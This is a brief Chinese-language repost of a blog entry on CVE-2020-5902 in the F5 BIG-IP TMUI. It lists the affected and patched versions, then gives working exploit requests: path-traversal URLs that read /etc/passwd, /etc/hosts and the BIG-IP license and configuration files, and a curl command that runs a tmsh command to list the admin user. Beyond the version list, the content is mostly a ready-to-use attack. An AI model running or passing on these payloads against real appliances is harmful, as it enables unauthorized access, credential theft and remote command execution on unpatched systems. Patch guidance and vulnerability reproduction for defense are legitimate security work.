标签:wechat ace 修复方法 cal jsp http 漏洞 url big-ip
BIG-IP的TMUI存在RCE漏洞
版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x
升级
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4
curl -v -k ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd‘
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
curl -v -k ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin‘
cve-2020-5902 BIG-IP RCE漏洞复现&exp
标签:wechat ace 修复方法 cal jsp http 漏洞 url big-ip
原文地址:https://www.cnblogs.com/potatsoSec/p/13253288.html